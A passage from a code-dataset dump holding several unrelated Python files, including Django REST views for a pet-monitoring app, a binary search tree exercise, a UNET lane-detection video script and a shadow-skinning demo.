gm.clientError(\"Invalid userid/email or password.\")\n\n\nclass userLogout(APIView):\n\n def get(self, request):\n return gm.clientError(\"GET Method is not supported.\")\n\n def post(self, request):\n\n data = request.data\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n user = getUser(data)\n\n if logout(data, user):\n return gm.successResponse(\"Successfully logged out.\")\n\n else:\n return gm.errorResponse(\"Couldn't log out user.\")\n\n\n\n\nclass pets(APIView):\n\n def get(self, request):\n pets = []\n params = request.query_params\n\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n\n else:\n user = getUser(params)\n if user.user_type.lower() in [\"admin\", \"customer_support\"]:\n userPets = Pets.objects.filter(is_deleted = 0)\n else:\n userPets = Pets.objects.filter(userid=params[\"userid\"], is_deleted = 0)\n\n for m in userPets:\n pet = {\n \"petid\": m.petid,\n \"name\": m.name,\n \"breed\": m.breed,\n \"weight\": m.weight,\n \"weight_unit\" : m.weight_unit,\n \"image_url\" : m.image_url,\n \"birthday\" : m.birthday,\n \"userid\" : m.userid_id\n }\n pets.append(pet)\n\n return gm.successResponse(pets)\n\n\n def post(self, request):\n requiredParams = [ \"name\", \"breed\", \"birthday\", \"image_url\", \"weight\", \"weight_unit\"]\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n requiredParams.pop(3)\n\n emptyParams = gm.emptyParams(requiredParams, data)\n if emptyParams:\n emptyParams = \", \".join(emptyParams)\n return gm.clientError((emptyParamMessage.format(emptyParams)))\n\n user = getUser(data)\n\n try:\n if data[\"image_url\"] not in [\"\", None]:\n imageUrl = data[\"image_url\"]\n else:\n imageUrl = petDefaultImage\n\n pet = user.pets_set.create(name = data[\"name\"],\\\n breed = data[\"breed\"], birthday = data[\"birthday\"],\\\n weight = data[\"weight\"],\\\n weight_unit = data[\"weight_unit\"], image_url = imageUrl)\n\n pet.save()\n\n except Exception as e:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"Error while 
saving device details.\")\n\n else:\n data[\"petid\"] = pet.petid\n data[\"image_url\"] = pet.image_url\n return gm.successResponse(data)\n\n\n\n def put(self, request):\n\n gm.errorLog(\"This\")\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"petid\"]\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n changeable = [\"petid\", \"name\", \"breed\", \"birthday\", \"image_url\", \"weight\", \"weight_unit\"]\n emptyParams = gm.emptyParams(changeable, data)\n if emptyParams:\n emptyParams = \", \".join(emptyParams)\n return gm.clientError(emptyParamMessage.format(emptyParams))\n\n user = getUser(data)\n pet = user.pets_set.filter(petid = data[\"petid\"], is_deleted = 0)\n\n if not pet:\n return gm.clientError(\"Invalid petid.\")\n\n pet = pet[0]\n try:\n pet = gm.change(pet, data, changeable)\n\n returnDict = {}\n for item in changeable:\n returnDict[item] = getattr(pet, item)\n\n return gm.successResponse(returnDict)\n\n\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error while making changes. Try again later.\")\n\n\n def delete(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"petid\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, data)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n try:\n pet = Pets.objects.get(petid = data[\"petid\"], is_deleted = 0)\n\n except Pets.DoesNotExist:\n return gm.clientError(\"Invalid petid.\")\n\n except :\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"Could not verify petid due to some error.\")\n\n else:\n pet.is_deleted = 1\n pet.save()\n return gm.successResponse(\"Pet with petid : {} successfully deleted.\".format(pet.petid))\n\n\n\nclass notificationUpdate(APIView):\n\n def post(self, request):\n gm.log(dir(request))\n data = gm.cleanData(request.data)\n gm.log(data)\n gm.log(request.query_params)\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"notification_token\", \"dev_type\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, data)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n user = getUser(data)\n tokenAdded = addNotificationToken(data, user)\n\n if tokenAdded:\n return gm.successResponse(\"notification_token updated successfully.\")\n\n else:\n return gm.errorResponse(\"There was an error while updating notification_token\")\n\n\n\n\nclass Event(APIView):\n\n\n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"userid\", \"machine_id\", \"startDate\", \"endDate\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n startDate = params[\"startDate\"]\n endDate = params[\"endDate\"]\n\n try:\n user = getUser(params)\n if user.user_type.lower() in [\"admin\", \"customer_support\"]:\n ev = events.objects.filter(date__range = (startDate, endDate), machine_id = params[\"machine_id\"]).order_by(\"-date\")\n else:\n ev = events.objects.filter(date__range = (startDate, endDate), machine_id = params[\"machine_id\"], userid = 
params[\"userid\"]).order_by(\"-date\")\n\n\n retSet = []\n\n for item in ev:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags,\n })\n\n\n return gm.successResponse(retSet)\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error generating response\")\n\n def post(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"eventid\"]\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n item = getEvent(data)\n retSet=[]\n if not item:\n return gm.clientError(\"Invalid event id\")\n try:\n item=updateEvent(data,item.eventid)\n if item:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags\n\n })\n\n return gm.successResponse(retSet)\n else:\n return gm.errorResponse(\"something went wrong\")\n\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error while making changes. Try again later.\")\n\n\n\"\"\"\nThis class will help us get the lastevent of a machine\nonly lookin, animal detection are taken\n\"\"\"\n\nclass LastEventOfTheMachine(APIView):\n\n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"userid\", \"machine_id\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n impEvents = [ \"LOOKIN\", \"ANIMAL_DETECTION\"]\n\n try:\n user = getUser(params)\n if user.user_type.lower() in [\"admin\", \"customer_support\"]:\n ev = events.objects.filter (type__in=impEvents, machine_id = params[\"machine_id\"]).order_by(\"-date\")[:1]\n else:\n ev = events.objects.filter (type__in=impEvents, machine_id = params[\"machine_id\"], userid = params[\"userid\"]).order_by(\"-date\")[:1] \n\n\n retSet = []\n\n for item in ev:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags,\n })\n \n return gm.successResponse(retSet)\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error generating response\")\n\n\n\"\"\"\nThis class will help us to get the filte th events based on the provided params\n\"\"\"\nclass FilterEvent(APIView):\n\n \n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"userid\",\"startDate\", \"endDate\", ]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n startDate = params[\"startDate\"]\n endDate = params[\"endDate\"]\n\n isFlagged=params.get(\"isFlagged\")\n\n mlist=params.get(\"mlist\")\n if mlist!= None:\n mlist=mlist.strip()\n mlist= list(mlist.split(\",\")) \n print(\"machine list is \"+str(mlist))\n\n typelist=params.get(\"typelist\")\n \n if typelist!= None:\n 
typelist=typelist.strip()\n typelist= list(typelist.split(\",\")) \n \n flagslist=params.get(\"flags\")\n \n if flagslist!= None:\n flagslist=flagslist.strip()\n flagslist= list(flagslist.split(\",\")) \n\n if validateEventTypeFalgLists(mlist,typelist,flagslist)== False:\n return gm.errorResponse(\"Invalid attribute in machine list, type list or in flags\")\n\n retSet = []\n try:\n \n ev=fileterEventsByMachines(params[\"userid\"],startDate,endDate,mlist,typelist,flagslist,isFlagged)\n\n if ev is not None:\n\n for item in ev:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags,\n })\n\n return gm.successResponse(retSet)\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error generating response\")\n\"\"\"\nThis class will help us flag and update an event without the mqtt\nTODO add the image size\n\n\"\"\"\nclass MqttEvent(APIView):\n\n def post(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"timestamp\",\"imagesize\",\"type\",\"machine_id\",\"userid\"]\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n item = getEventByTimestampAndSize(data)\n retSet=[]\n if not item:\n return gm.clientError(\"Invalid event\")\n try:\n item=updateEvent(data,item.eventid)\n if item:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags\n\n })\n\n return gm.successResponse(retSet)\n else:\n return gm.errorResponse(\"something went wrong\")\n\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error while making changes. 
Try again later.\")\n\n\n\nclass GraphEventCount(APIView):\n\n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"type\",\"machineid\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n ev = getTheMonthlyEventsCountBasedOnType(params[\"type\"],params[\"machineid\"])\n if ev is not None:\n retSet=[]\n for item in ev:\n retSet.append({\n \"event_date\":item.event_date,\n \"event_count\" : item.event_count\n })\n\n return gm.successResponse(retSet)\n \n\nclass TimerSlotDetials(APIView):\n\n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"machine_id\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n ev = fileterTimeslotsByMachines(params[\"machine_id\"],params[\"userid\"])\n\n if ev is not None:\n retSet=[]\n for item in ev:\n retSet.append({\n \"timerid\" : item.timerId,\n \"timeinsecond\" : item.timeinseconds,\n \"weeks\" : item.weeklystring,\n \"weeklyvalue\" : item.weekly_value,\n \"isactive\":item.is_active,\n \"isdeleted\":item.is_deleted,\n })\n return gm.successResponse(retSet)\n\n\n \"\"\" Takes teh create_flag boolean parameter which invokes the creation of timer if it is true\n and if it is false, it will update the existing timer with timerid attribiute \"\"\"\n\n def post(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n\n requiredParams = [\"userid\",\"weeks\",\"activity_flag\",\"seconds\",\"machine_id\",\"create_flag\"]\n missingParams = gm.missingParams(requiredParams, data)\n\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n \n try:\n weeks= None if \"weeks\" not in data else data[\"weeks\"]\n timeinseconds= None if \"seconds\" not in data else data[\"seconds\"]\n isActive= None if \"activity_flag\" not in data else data[\"activity_flag\"]\n isCreateFlag= None if \"create_flag\" not in data else data[\"create_flag\"]\n timeinseconds= None if \"seconds\" not in data else data[\"seconds\"]\n timerid= None if \"timerid\" not in data else data[\"timerid\"]\n delete_flag= None if \"delete_flag\" not in data else data[\"delete_flag\"]\n\n \n\n \n if int(isCreateFlag):\n item = createTimerForMachine(weeks,timeinseconds,isActive,data[\"machine_id\"])\n else:\n \n if timerid is None:\n return gm.clientError(\"timerid missing in post data.\")\n \n item=updateTimerForMachine(weeks,timeinseconds,isActive,data[\"machine_id\"],timerid,delete_flag)\n \n retSet=[]\n if item:\n retSet.append({\n \"timerid\" : item.timerId,\n \"timeinsecond\" : item.timeinseconds,\n \"weeks\" : item.weeklystring,\n \"weeklyvalue\" : item.weekly_value,\n \"isactive\":item.is_active,\n \"isdeleted\":item.is_deleted,\n })\n\n return gm.successResponse(retSet)\n else:\n return gm.errorResponse(\"something went wrong\")\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error while making changes. 
Try again later.\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"cumulations/brilliantPet","sub_path":"brilliantPet/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9007178387","text":"#implement binary tree fcns like insert, delete and find\r\n\r\nclass Node:\r\n\tdef __init__(self,data):\r\n\t\tself.data = data\r\n\t\tself.left = None\r\n\t\tself.right = None\r\n\t\t\r\n\r\ndef insert(node,data):\r\n\t#new_node = Node(data)\r\n\t#node = root\r\n\twhile(node != None):\r\n\t\tif(node.data= data and node.left == None):\r\n\t\t\tnode.left = Node(data)\r\n\t\t\tbreak\r\n\t\telif(node.data>= data):\r\n\t\t\tnode = node.left\r\n\r\ndef find(root,data):\r\n\t\t\t\r\n\tif(root.data == data):\r\n\t\tprint(\"found the data,returning True\")\r\n\t\treturn True\r\n\t\t\t\r\n\tif(root.right):\r\n\t\tprint(\"entering root.right\")\r\n\t\tif(find(root.right,data)):\r\n\t\t\tprint(\"data found in right sub tree of %d\"%root.data)\r\n\t\t\treturn True\t\t\r\n\t\r\n\tif(root.left):\r\n\t\tif(find(root.left,data)):\r\n\t\t\tprint(\"data found in left sub tree of %d\"%root.data)\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tprint(\"data not found in left sub tree of %d\"%root.data)\r\n\t\t\t\r\n\t\r\n\tprint(\"data not found in left or right sub tree of %d\"%root.data)\r\n\treturn False\r\n\t\t\t\r\n\r\ndef find_and_delete_min(root):\r\n\tto_be_Deleted = root\r\n\tright_subtree = to_be_Deleted.right\r\n\tif (not right_subtree.right and not right_subtree.left):\r\n\t\tto_be_Deleted.right = None\r\n\t\treturn right_subtree.data\r\n\telif (right_subtree.right and not right_subtree.left):\r\n\t\tto_be_Deleted.right = right_subtree.right\r\n\t\treturn right_subtree.data\r\n\telse:\r\n\t\tsmallest = right_subtree.left\r\n\t\twhile(smallest.left):\r\n\t\t\tright_subtree = right_subtree.left\r\n\t\t\tsmallest = right_subtree.left\r\n\t\r\n\t\tans = smallest.data\r\n\t\tif(smallest.right):\r\n\t\t\tright_subtree.left = smallest.right\r\n\t\telse:\r\n\t\t\tright_subtree.left = None\r\n\t\treturn smallest.data\r\n\t\t\t\r\n\t\t\t\r\ndef delete(root,data):\r\n\tif(root.data == data):\r\n\t\tprint(\"found the data,returning True\")\r\n\t\treturn True\r\n\t\t\t\r\n\tif(root.right):\r\n\t\tprint(\"entering root.right with root %d\" %root.data)\r\n\t\tif(delete(root.right,data)):\r\n\t\t\tprint(\"to_be_Deleted is %d\"%root.right.data)\r\n\t\t\tprint(\"data found in right sub tree of %d\"%root.data)\r\n\t\t\tto_be_Deleted = root.right\t\t\t\r\n\t\t\tif(not to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\troot.right = None\r\n\t\t\telif(to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\t#has a left child\r\n\t\t\t\troot.right = to_be_Deleted.left\r\n\t\t\telif(not to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has a right child\r\n\t\t\t\troot.right = to_be_Deleted.right\r\n\t\t\telif(to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has both children\r\n\t\t\t\tvalue = find_and_delete_min(to_be_Deleted)\r\n\t\t\t\tto_be_Deleted.data = value\r\n\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\r\n\tif(root.left):\r\n\t\tif(delete(root.left,data)):\r\n\t\t\tprint(\"data found in left sub tree of %d\"%root.data)\r\n\t\t\tto_be_Deleted = root.left\r\n\t\t\tprint(\"to_be_Deleted is %d\"%to_be_Deleted.data)\r\n\t\t\tif(not to_be_Deleted.left and not 
\r\ndef find(root,data):\r\n\t\t\t\r\n\tif(root.data == data):\r\n\t\tprint(\"found the data,returning True\")\r\n\t\treturn True\r\n\t\t\t\r\n\tif(root.right):\r\n\t\tprint(\"entering root.right\")\r\n\t\tif(find(root.right,data)):\r\n\t\t\tprint(\"data found in right sub tree of %d\"%root.data)\r\n\t\t\treturn True\t\t\r\n\t\r\n\tif(root.left):\r\n\t\tif(find(root.left,data)):\r\n\t\t\tprint(\"data found in left sub tree of %d\"%root.data)\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tprint(\"data not found in left sub tree of %d\"%root.data)\r\n\t\t\t\r\n\t\r\n\tprint(\"data not found in left or right sub tree of %d\"%root.data)\r\n\treturn False\r\n\t\t\t\r\n\r\ndef find_and_delete_min(root):\r\n\tto_be_Deleted = root\r\n\tright_subtree = to_be_Deleted.right\r\n\tif (not right_subtree.right and not right_subtree.left):\r\n\t\tto_be_Deleted.right = None\r\n\t\treturn right_subtree.data\r\n\telif (right_subtree.right and not right_subtree.left):\r\n\t\tto_be_Deleted.right = right_subtree.right\r\n\t\treturn right_subtree.data\r\n\telse:\r\n\t\tsmallest = right_subtree.left\r\n\t\twhile(smallest.left):\r\n\t\t\tright_subtree = right_subtree.left\r\n\t\t\tsmallest = right_subtree.left\r\n\t\r\n\t\tif(smallest.right):\r\n\t\t\tright_subtree.left = smallest.right\r\n\t\telse:\r\n\t\t\tright_subtree.left = None\r\n\t\treturn smallest.data\r\n\t\t\t\r\n\t\t\t\r\ndef delete(root,data):\r\n\tif(root.data == data):\r\n\t\tprint(\"found the data,returning True\")\r\n\t\treturn True\r\n\t\t\t\r\n\tif(root.right):\r\n\t\tprint(\"entering root.right with root %d\" %root.data)\r\n\t\tif(delete(root.right,data)):\r\n\t\t\tprint(\"to_be_Deleted is %d\"%root.right.data)\r\n\t\t\tprint(\"data found in right sub tree of %d\"%root.data)\r\n\t\t\tto_be_Deleted = root.right\t\t\t\r\n\t\t\tif(not to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\troot.right = None\r\n\t\t\telif(to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\t#has a left child\r\n\t\t\t\troot.right = to_be_Deleted.left\r\n\t\t\telif(not to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has a right child\r\n\t\t\t\troot.right = to_be_Deleted.right\r\n\t\t\telif(to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has both children\r\n\t\t\t\tvalue = find_and_delete_min(to_be_Deleted)\r\n\t\t\t\tto_be_Deleted.data = value\r\n\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\r\n\tif(root.left):\r\n\t\tif(delete(root.left,data)):\r\n\t\t\tprint(\"data found in left sub tree of %d\"%root.data)\r\n\t\t\tto_be_Deleted = root.left\r\n\t\t\tprint(\"to_be_Deleted is %d\"%to_be_Deleted.data)\r\n\t\t\tif(not to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\troot.left = None\r\n\t\t\telif(to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\t#has a left child\r\n\t\t\t\troot.left = to_be_Deleted.left\r\n\t\t\telif(not to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has a right child\r\n\t\t\t\troot.left = to_be_Deleted.right\r\n\t\t\telif(to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has both children\r\n\t\t\t\tvalue = find_and_delete_min(to_be_Deleted)\r\n\t\t\t\tto_be_Deleted.data = value\r\n\t\t\r\n\t\r\n\tprint(\"data not found in left or right sub tree of %d\"%root.data)\r\n\t#return False\r\n\t\r\n\t\t\t\r\ndef traverse(root):\r\n\tif(root.left):\r\n\t\ttraverse(root.left)\r\n\tprint(root.data)\r\n\tif(root.right):\r\n\t\ttraverse(root.right)\r\n\r\n\t\r\n\t\r\nnode = Node(20)\r\ninsert(node,15)\r\ninsert(node,35)\r\ninsert(node,10)\r\ninsert(node,12)\r\ninsert(node,28)\r\ninsert(node,22)\r\ninsert(node,45)\r\ntraverse(node)\r\n#ans = find(node,22)\r\n#print(ans)\r\ndelete(node,28)\r\ntraverse(node)\r\n\r\n\r\n\r\n\t\r\n","repo_name":"amolikab/Trees-n-Graphs","sub_path":"#implement binary tree fcns like insert, delete and find.py","file_name":"#implement binary tree fcns like insert, delete and find.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72191278856","text":"# C:\\Users\\joeys\\source\\virtualenvs\\pytorchenv\\Scripts\\activate.bat\n\nimport cv2\nimport numpy as np\nimport torchvision.transforms as T\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms.functional as TF\nimport albumentations as A\nfrom PIL import Image\nfrom albumentations.pytorch import ToTensorV2\n\n\nCHECKPOINT_PATH = r\"C:\\Users\\joeys\\source\\lane-detection\\my_checkpoint.pth.tar\"\nVIDEO_FILE = r\"C:\\Users\\joeys\\OneDrive\\Desktop\\production ID_4608285.mp4\"\nSENSITIVITY = 230 # between 0-255, decides which values to count for mask\nSCALE_PERCENTAGE = 50\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nIMAGE_HEIGHT = 320  # 1280 originally\nIMAGE_WIDTH = 480  # 1918 originally\n\n\n\n\nclass DoubleConv(nn.Module):\n    def __init__(self, in_channels, out_channels):\n        super(DoubleConv, self).__init__()\n        self.conv = nn.Sequential(\n            nn.Conv2d(in_channels, out_channels, 3, 1, 1, bias=False),\n            nn.BatchNorm2d(out_channels),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False),\n            nn.BatchNorm2d(out_channels),\n            nn.ReLU(inplace=True),\n        )\n\n    def forward(self, x):\n        return self.conv(x)\n\nclass UNET(nn.Module):\n    def __init__(\n        self, in_channels=3, out_channels=1, features=[64, 128, 256, 512],\n    ):\n        super(UNET, self).__init__()\n        self.ups = nn.ModuleList()\n        self.downs = nn.ModuleList()\n        self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n\n        # Down part of UNET\n        for feature in features:\n            self.downs.append(DoubleConv(in_channels, feature))\n            in_channels = feature\n\n        # Up part of UNET\n        for feature in reversed(features):\n            self.ups.append(\n                nn.ConvTranspose2d(\n                    feature*2, feature, kernel_size=2, stride=2,\n                )\n            )\n            self.ups.append(DoubleConv(feature*2, feature))\n\n        self.bottleneck = DoubleConv(features[-1], features[-1]*2)\n        self.final_conv = nn.Conv2d(features[0], out_channels, kernel_size=1)\n\n    def forward(self, x):\n        skip_connections = []\n\n        for down in self.downs:\n            x = down(x)\n            skip_connections.append(x)\n            x = self.pool(x)\n\n        x = self.bottleneck(x)\n        skip_connections = skip_connections[::-1]\n\n        for idx in range(0, len(self.ups), 2):\n            x = self.ups[idx](x)\n            skip_connection = skip_connections[idx//2]\n\n            if x.shape != skip_connection.shape:\n                x = TF.resize(x, size=skip_connection.shape[2:])\n\n            concat_skip = torch.cat((skip_connection, x), dim=1)\n            x = self.ups[idx+1](concat_skip)\n\n        return self.final_conv(x)\n\n    def test(): # note: defined without self, so call it as UNET.test()\n        x = torch.randn((3, 1, 161, 161))\n        model = UNET(in_channels=1, out_channels=1)\n        preds = model(x)\n        assert preds.shape == x.shape\n
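\n# Shape sketch (illustrative, for the default features [64, 128, 256, 512]):\n#   (N, 3, H, W) -> 4 down blocks with pooling -> bottleneck (N, 1024, H/16, W/16)\n#   -> 4 up blocks with skip connections -> final_conv -> (N, 1, H, W)\n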
\nmodel = UNET(in_channels=3, out_channels=1).to(DEVICE)\nmodel_file = torch.load(CHECKPOINT_PATH)\nmodel.load_state_dict(model_file['state_dict'])\nmodel.eval()\n\n# only deterministic ops are used here: random rotations/flips belong in training, not video inference\ntrain_transform = A.Compose(\n    [\n        A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n        A.Normalize(\n            mean=[0.0, 0.0, 0.0],\n            std=[1.0, 1.0, 1.0],\n            max_pixel_value=255.0,\n        ),\n        ToTensorV2(),\n    ],\n    )\n\n\n\ncap = cv2.VideoCapture(VIDEO_FILE)\n \nif (cap.isOpened()== False):\n    print(\"Error opening video file\")\n \nwhile(cap.isOpened()):\n    \n    ret, frame = cap.read()\n    if ret == True:\n        width = int(frame.shape[1] * SCALE_PERCENTAGE / 100)\n        height = int(frame.shape[0] * SCALE_PERCENTAGE / 100)\n        dsize = (width, height)\n        frame = cv2.resize(frame, dsize)\n        augmentations = train_transform(image=frame)\n        image = augmentations[\"image\"]\n        image = image.to(DEVICE)\n        image = image.unsqueeze(0)\n        \n        with torch.no_grad():\n            pred = torch.sigmoid(model(image))\n            pred = (pred > 0.5).float()\n\n        transform = T.ToPILImage()\n        pred = torch.squeeze(pred)\n        predicted_mask = transform(pred)\n        predicted_mask = np.array(predicted_mask)\n        image = frame\n        predicted_mask = cv2.resize(predicted_mask, (image.shape[1], image.shape[0]))\n        color_mask = np.zeros_like(image)\n        color_mask[predicted_mask >= SENSITIVITY] = (0, 0, 255) # red in BGR\n        masked_color = cv2.bitwise_and(image, color_mask)\n        output = cv2.addWeighted(image, 0.9, masked_color, 0.9, 1)\n\n\n\n        cv2.imshow('Frame', output)\n        \n        if cv2.waitKey(25) & 0xFF == ord('q'):\n            break\n    \n    else:\n        break\n    \ncap.release()\ncv2.destroyAllWindows()","repo_name":"joeysantana3/lane-detection","sub_path":"pytorch_script.py","file_name":"pytorch_script.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71880985417","text":"#Node greater than x\nfrom binarytree import takeinput, printdata\n\ndef nodegtx(root, x):\n    if root is None:\n        return 0\n    count=0\n    if root.data>x:\n        count+=1\n    \n    left=nodegtx(root.left,x)\n    right=nodegtx(root.right,x)\n\n    return count+left +right\n
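\n# Example (illustrative): for a tree with root 5 and children 3 and 9,\n# nodegtx(root, 4) returns 2, since 5 and 9 are greater than 4.\n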
\nroot=takeinput()\nprintdata(root)\nx=int(input())\nprint(nodegtx(root,x))\n","repo_name":"iamanx17/dslearn","sub_path":"Binary Tree/nodegx.py","file_name":"nodegx.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35457224690","text":"import sys\n\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom tf_pose.common import read_imgfile\n\nfrom lib.draw import draw_circle\nfrom lib.contour import find_human_contour\nfrom lib.skeleton import SkeletonImplement, SkeletonTest\nfrom lib.skinning import Skinning\n\nif __name__ == '__main__':\n    src = read_imgfile(\"./images/shadow.jpg\", None, None)\n    dst = src.copy()\n    human_contour = find_human_contour(src)\n    if human_contour is None:\n        print(\"No human contour was detected in the image.\")\n        sys.exit(0)\n\n    skeletonImplement = SkeletonImplement()\n    human = skeletonImplement.infer_skeleton(src)\n    if human is None:\n        print(\"No human was detected in the image.\")\n        sys.exit(0)\n\n    skeletonTest = SkeletonTest(human, human_contour, src.shape)\n    if not skeletonTest.is_reliable():\n        skeletonTest.report()\n        print(\"This skeleton model is not reliable.\")\n        sys.exit(0)\n\n    skinning = Skinning(src, human, human_contour, algorithm=\"nearest_neighbour_within_contour\")\n\n    # visualization\n    for i in [100, 300, 500]:\n        draw_circle(dst, skinning.contour_vertex_positions[i], (255, 0, 0))\n        draw_circle(dst, skinning.body_part_positions[skinning.nearest_body_part_indices[i]])\n\n    plt.imshow(cv2.cvtColor(dst, cv2.COLOR_BGR2RGB))\n    plt.show()\n","repo_name":"ajingu/ShadowSkinning","sub_path":"nearest_neighbour_skinning.py","file_name":"nearest_neighbour_skinning.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} 